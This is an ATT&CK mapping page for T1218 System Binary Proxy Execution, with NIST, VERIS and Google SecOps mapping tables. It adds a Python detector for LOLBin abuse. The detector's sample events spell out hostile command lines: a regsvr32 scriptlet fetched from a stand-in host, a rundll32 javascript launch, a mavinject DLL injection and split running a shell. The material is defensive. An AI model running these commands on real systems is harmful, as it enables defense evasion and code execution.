T1218 System Binary Proxy Execution Mappings

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content through signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native to the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft-signed binaries that are present on default Windows installations can be used to proxy execution of other files or commands.

Similarly, on Linux systems adversaries may abuse trusted binaries such as <code>split</code> to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split)
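The description above lists the behaviour; the detection mappings further down the page (including the Google Security Operations rule for mavinject) only score coverage. The following is an added example, not code from this mapping page or from MITRE, Google or any of the mapped products: a small heuristic detector that runs over process-creation events and flags the proxy-execution patterns the technique and its sub-techniques describe (rundll32, regsvr32, mshta, mavinject, msiexec and GNU split --filter), plus the Office-parent context that usually precedes them. The event schema (ProcEvent), the rule thresholds, the host names and every sample event are constructed for this illustration and are not real telemetry.

```python
"""Added example (not code from the mapping page, MITRE, Google or any vendor):
heuristic detection of T1218 System Binary Proxy Execution over constructed
process-creation events. Event schema, rule thresholds and samples are assumptions."""
import os
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    image: str          # path of the process that started
    cmdline: str        # its full command line
    parent_image: str   # path of the parent process


@dataclass(frozen=True)
class Finding:
    host: str
    technique: str      # ATT&CK ID the heuristic maps to
    reason: str


# Payload locations an attacker can write to, or that are fetched remotely.
USER_WRITABLE = re.compile(r"\\(users|temp|appdata|programdata|public)\\", re.I)
REMOTE = re.compile(r"https?://|\\\\[a-z0-9_.-]+\\", re.I)   # URL or UNC share
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def _base(path: str) -> str:
    """Lower-cased basename of a Windows or POSIX path."""
    return os.path.basename(path.replace("\\", "/")).lower()


def _has(c: str, *needles: str) -> bool:
    return any(n in c for n in needles)


# (technique, image basename, predicate over the lower-cased command line, reason)
RULES = [
    ("T1218.011", "rundll32.exe",
     lambda c: bool(USER_WRITABLE.search(c) or REMOTE.search(c)) or "javascript:" in c,
     "rundll32 loading a DLL or script from a user-writable or remote location"),
    ("T1218.010", "regsvr32.exe",
     lambda c: "scrobj.dll" in c or ("/i:" in c and bool(REMOTE.search(c))),
     "regsvr32 with scrobj.dll or a remote /i: scriptlet"),
    ("T1218.005", "mshta.exe",
     lambda c: _has(c, "javascript:", "vbscript:") or bool(REMOTE.search(c) or USER_WRITABLE.search(c)),
     "mshta running inline script or an HTA from a remote or user-writable path"),
    ("T1218.013", "mavinject.exe",
     lambda c: "/injectrunning" in c,
     "mavinject /INJECTRUNNING injecting a DLL into a running process"),
    ("T1218.007", "msiexec.exe",
     lambda c: bool(REMOTE.search(c)) or " /y " in f" {c} ",
     "msiexec installing a remote package or registering a DLL with /y"),
    ("T1218", "split",
     lambda c: "--filter" in c,
     "GNU split --filter executing a command for each chunk (Linux proxy execution)"),
]
PROXY_BINARIES = {binary for _, binary, _, _ in RULES}


def scan(events):
    """Return one Finding per matched heuristic, in event order."""
    findings = []
    for ev in events:
        image, parent, cmd = _base(ev.image), _base(ev.parent_image), ev.cmdline.lower()
        for technique, binary, predicate, reason in RULES:
            if image == binary and predicate(cmd):
                findings.append(Finding(ev.host, technique, reason))
        # Parent-child context: a proxy binary spawned by an Office application is
        # suspicious regardless of its arguments (typical macro -> LOLBin chain).
        if image in PROXY_BINARIES and parent in OFFICE_PARENTS:
            findings.append(Finding(ev.host, "T1218", f"{image} spawned by Office process {parent}"))
    return findings


# Constructed sample telemetry (not real logs); hosts and URL are placeholders.
SAMPLE_EVENTS = [
    ProcEvent("ws01", r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe shell32.dll,Control_RunDLL", r"C:\Windows\explorer.exe"),   # benign
    ProcEvent("ws01", r"C:\Windows\System32\rundll32.exe",
              r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert(1)',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent("ws02", r"C:\Windows\System32\regsvr32.exe",
              r"regsvr32.exe /s /n /u /i:http://example.invalid/p.sct scrobj.dll",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    ProcEvent("ws02", r"C:\Windows\System32\mavinject.exe",
              r"mavinject.exe 4321 /INJECTRUNNING C:\Users\Public\stage.dll",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcEvent("srv01", "/usr/bin/split", "split --filter=/bin/sh /dev/stdin", "/bin/bash"),
    ProcEvent("ws03", r"C:\Windows\System32\msiexec.exe",
              r'msiexec.exe /i "C:\Program Files\Vendor\setup.msi" /qn',
              r"C:\Windows\System32\services.exe"),                                      # benign
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.host}: {f.technique} - {f.reason}")
```

Run against the constructed sample, the benign rundll32 and msiexec launches produce nothing, while the scriptlet-loading regsvr32 spawned by WINWORD.EXE produces two findings (the argument heuristic and the parent-process heuristic). The predicates are deliberately narrow; in production they need tuning against the environment's software inventory (compare the CM-08 and CM-07 mappings in the NIST table), and the parent-process check is usually the lower-noise signal.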


NIST 800-53 Mappings

| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
|---|---|---|---|---|---|
| CA-07 | Continuous Monitoring | mitigates | T1218 | System Binary Proxy Execution | |
| CM-06 | Configuration Settings | mitigates | T1218 | System Binary Proxy Execution | |
| CM-05 | Access Restrictions for Change | mitigates | T1218 | System Binary Proxy Execution | |
| CM-11 | User-installed Software | mitigates | T1218 | System Binary Proxy Execution | |
| SI-16 | Memory Protection | mitigates | T1218 | System Binary Proxy Execution | |
| RA-05 | Vulnerability Monitoring and Scanning | mitigates | T1218 | System Binary Proxy Execution | |
| CM-08 | System Component Inventory | mitigates | T1218 | System Binary Proxy Execution | |
| SI-10 | Information Input Validation | mitigates | T1218 | System Binary Proxy Execution | |
| SI-03 | Malicious Code Protection | mitigates | T1218 | System Binary Proxy Execution | |
| SI-07 | Software, Firmware, and Information Integrity | mitigates | T1218 | System Binary Proxy Execution | |
| CM-02 | Baseline Configuration | mitigates | T1218 | System Binary Proxy Execution | |
| IA-02 | Identification and Authentication (Organizational Users) | mitigates | T1218 | System Binary Proxy Execution | |
| CM-07 | Least Functionality | mitigates | T1218 | System Binary Proxy Execution | |
| SI-04 | System Monitoring | mitigates | T1218 | System Binary Proxy Execution | |
| AC-02 | Account Management | mitigates | T1218 | System Binary Proxy Execution | |
| AC-06 | Least Privilege | mitigates | T1218 | System Binary Proxy Execution | |
| AC-03 | Access Enforcement | mitigates | T1218 | System Binary Proxy Execution | |
| AC-05 | Separation of Duties | mitigates | T1218 | System Binary Proxy Execution | |
| AC-04 | Information Flow Enforcement | mitigates | T1218 | System Binary Proxy Execution | |
| SC-07 | Boundary Protection | mitigates | T1218 | System Binary Proxy Execution | |

VERIS Mappings

| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
|---|---|---|---|---|---|
| action.hacking.variety.Abuse of functionality | Abuse of functionality | related-to | T1218 | System Binary Proxy Execution | |
| action.malware.variety.Destroy data | Destroy or corrupt stored data | related-to | T1218 | System Binary Proxy Execution | |

GCP Mappings

| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
|---|---|---|---|---|---|
| google_secops | Google Security Operations | technique_scores | T1218 | System Binary Proxy Execution | see Comments |

Comments

Google Security Operations can raise an alert on attempts to evade defenses, such as proxying execution through digitally signed binaries. This technique was scored as Minimal based on a low or uncertain detection coverage factor. The referenced rule (a YARA-L process-creation rule targeting mavinject process injection) is: https://github.com/chronicle/detection-rules/blob/783e0e5947774785db1c55041b70176deeca6f46/soc_prime_rules/threat_hunting/process_creation/mavinject_process_injection.yaral

ATT&CK Subtechniques

| Technique ID | Technique Name | Number of Mappings |
|---|---|---|
| T1218.011 | Rundll32 | 5 |
| T1218.013 | Mavinject | 13 |
| T1218.004 | InstallUtil | 12 |
| T1218.007 | Msiexec | 10 |
| T1218.003 | CMSTP | 13 |
| T1218.002 | Control Panel | 12 |
| T1218.015 | Electron Applications | 20 |
| T1218.008 | Odbcconf | 12 |
| T1218.012 | Verclsid | 17 |
| T1218.005 | Mshta | 13 |
| T1218.001 | Compiled HTML File | 11 |
| T1218.010 | Regsvr32 | 6 |
| T1218.009 | Regsvcs/Regasm | 12 |
| T1218.014 | MMC | 12 |